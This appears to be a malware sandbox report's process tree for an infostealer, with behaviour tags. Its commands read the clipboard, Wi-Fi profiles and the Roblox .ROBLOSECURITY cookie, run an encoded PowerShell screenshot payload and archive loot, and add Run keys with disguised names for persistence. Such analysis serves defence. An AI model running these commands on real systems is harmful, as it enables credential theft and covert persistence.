        wmic path win32_VideoController get name
        63⤵
        Detects videocard installed
        
        PID:5992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        62⤵
        
        PID:3996
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        63⤵
        Enumerates processes with tasklist
        
        PID:5324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        62⤵
        
        PID:1448
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        63⤵
        Enumerates processes with tasklist
        
        PID:5780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        62⤵
        
        PID:4588
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        63⤵
        
        PID:2980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        62⤵
        Clipboard Data
        
        PID:5008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        63⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:2248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        62⤵
        
        PID:1732
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        63⤵
        Enumerates processes with tasklist
        
        PID:4300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        62⤵
        
        PID:2252
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        63⤵
        
        PID:4364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        62⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2516
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        63⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        62⤵
        
        PID:5044
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        63⤵
        Gathers system information
        
        PID:3188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        62⤵
        
        PID:5968
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        63⤵
        
        PID:5788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        62⤵
        
        PID:368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        63⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1276
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2550zkfx\2550zkfx.cmdline"
        64⤵
        
        PID:3244
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC85.tmp" "c:\Users\Admin\AppData\Local\Temp\2550zkfx\CSCEDC1BD54A26B460EB6EB3D577667581.TMP"
        65⤵
        
        PID:3984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        62⤵
        
        PID:4876
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        63⤵
        
        PID:2360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        62⤵
        
        PID:3404
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        63⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        62⤵
        
        PID:3080
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        63⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        62⤵
        
        PID:5332
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        63⤵
        
        PID:2480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        62⤵
        
        PID:5588
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        63⤵
        Enumerates processes with tasklist
        
        PID:2640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        62⤵
        
        PID:5192
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        63⤵
        
        PID:6044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        62⤵
        
        PID:5240
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        63⤵
        
        PID:5556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        62⤵
        
        PID:1644
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        63⤵
        
        PID:5568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        62⤵
        
        PID:2856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        63⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        62⤵
        
        PID:2968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        63⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        62⤵
        
        PID:4896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        63⤵
        
        PID:5968
        
        C:\Windows\system32\getmac.exe
        
        getmac
        63⤵
        
        PID:3396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\7q0md.zip" *"
        62⤵
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\7q0md.zip" *
        63⤵
        
        PID:5576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        62⤵
        
        PID:5644
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        63⤵
        
        PID:5404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        62⤵
        
        PID:4780
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        63⤵
        
        PID:4088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        62⤵
        
        PID:1016
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        63⤵
        
        PID:2764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        62⤵
        
        PID:5536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        62⤵
        
        PID:5692
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        63⤵
        Detects videocard installed
        
        PID:5840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        62⤵
        
        PID:3220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        63⤵
        
        PID:3924
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        60⤵
        
        PID:5704
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        60⤵
        Checks computer location settings
        
        PID:516
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AB7D.tmp\AB7E.tmp\AB7F.bat C:\Windows\system32\java.exe"
        61⤵
        
        PID:2272
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        62⤵
        
        PID:100
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        62⤵
        
        PID:2216
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        62⤵
        
        PID:1836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        62⤵
        
        PID:416
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        62⤵
        
        PID:5716
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        62⤵
        
        PID:3492
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        63⤵
        
        PID:5972
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        62⤵
        
        PID:5848
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        62⤵
        Checks computer location settings
        
        PID:3260
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B2E0.tmp\B2E1.tmp\B2E2.bat C:\Windows\system32\java.exe"
        63⤵
        Drops file in System32 directory
        
        PID:5428
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        64⤵
        
        PID:3804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        64⤵
        
        PID:4952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        64⤵
        
        PID:5348
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        64⤵
        
        PID:5236
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        64⤵
        Adds Run key to start application
        
        PID:5492
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        64⤵
        
        PID:4288
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        65⤵
        
        PID:3696
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        64⤵
        
        PID:6112
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        64⤵
        Checks computer location settings
        
        PID:1092
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BDAE.tmp\BDAF.tmp\BDB0.bat C:\Windows\system32\java.exe"
        65⤵
        
        PID:1448
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        66⤵
        Delays execution with timeout.exe
        
        PID:5708
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        66⤵
        
        PID:5636
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        66⤵
        
        PID:5332
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        66⤵
        
        PID:5808
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        66⤵
        
        PID:852
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        66⤵
        
        PID:5784
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        67⤵
        
        PID:5240
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        66⤵
        
        PID:4988
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        66⤵
        Checks computer location settings
        
        PID:5524
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C3D8.tmp\C3D9.tmp\C3DA.bat C:\Windows\system32\java.exe"
        67⤵
        
        PID:1136
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        68⤵
        
        PID:1732
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        68⤵
        
        PID:4088
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
